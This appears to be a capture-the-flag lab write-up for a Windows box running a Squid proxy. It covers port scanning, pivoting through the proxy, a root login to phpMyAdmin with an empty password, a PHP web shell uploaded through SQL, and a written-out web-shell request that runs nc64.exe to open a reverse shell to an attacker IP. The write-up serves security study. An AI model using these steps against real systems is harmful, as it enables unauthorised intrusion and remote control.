search

Squid

hashtag
Nmap Scan

$ nmap -sC -sV -p- --min-rate 10000 -Pn -oN nmap 192.168.158.189
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-11 13:32 +08
Nmap scan report for 192.168.158.189
Host is up (0.015s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3128/tcp  open  http-proxy    Squid http proxy 4.14
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/4.14
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-06-11T05:33:39
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.49 seconds

hashtag
Initial Access

hashtag
Enum4Linux

hashtag
Null Session

hashtag
Guest Session

hashtag
Port 3128

There is a website running on port 3128.

Upon closer inspection, we can see that is it running on squid with version 4.14.

Logo3128 - Pentesting Squid - HackTricksbook.hacktricks.xyzchevron-right
LogoGitHub - aancw/spose: Squid Pivoting Open Port ScannerGitHubchevron-right

hashtag
Hidden ports behind web proxy

Next, we will try to see if there is any hidden ports that can be found using the proxy.

We can see there are 2 ports that is opened. The next step is to visit either of those websites. First, we need to setup the proxy on the web browser before we are able to access.

After setting and visiting port 8080, we can see there is a website running on it.

When we go into the phpMyAdmin page, we greeted with a login page.

We are then able to login using root and empty password. We are then greeted with that.

After enumerating around, we are able to see there is a page where we are able to execute SQL statements.

hashtag
Uploading file to do RCE

Next, we are able to upload the file to the website so that we are able to do cute executions.

Next, we just visit the website: http://192.168.158.189:8080/revshell.php?c=dirto see whether does it works and sure enough it works.

Then we will just use curl to down nc64.exe to the website. Finally, we will just execute the payload to get a reverse shell.

http://192.168.158.189:8080/revshell.php?c=nc64.exe%20192.168.45.196%204444%20-e%20cmd

PreviousResourcedNextDVR4

Last updated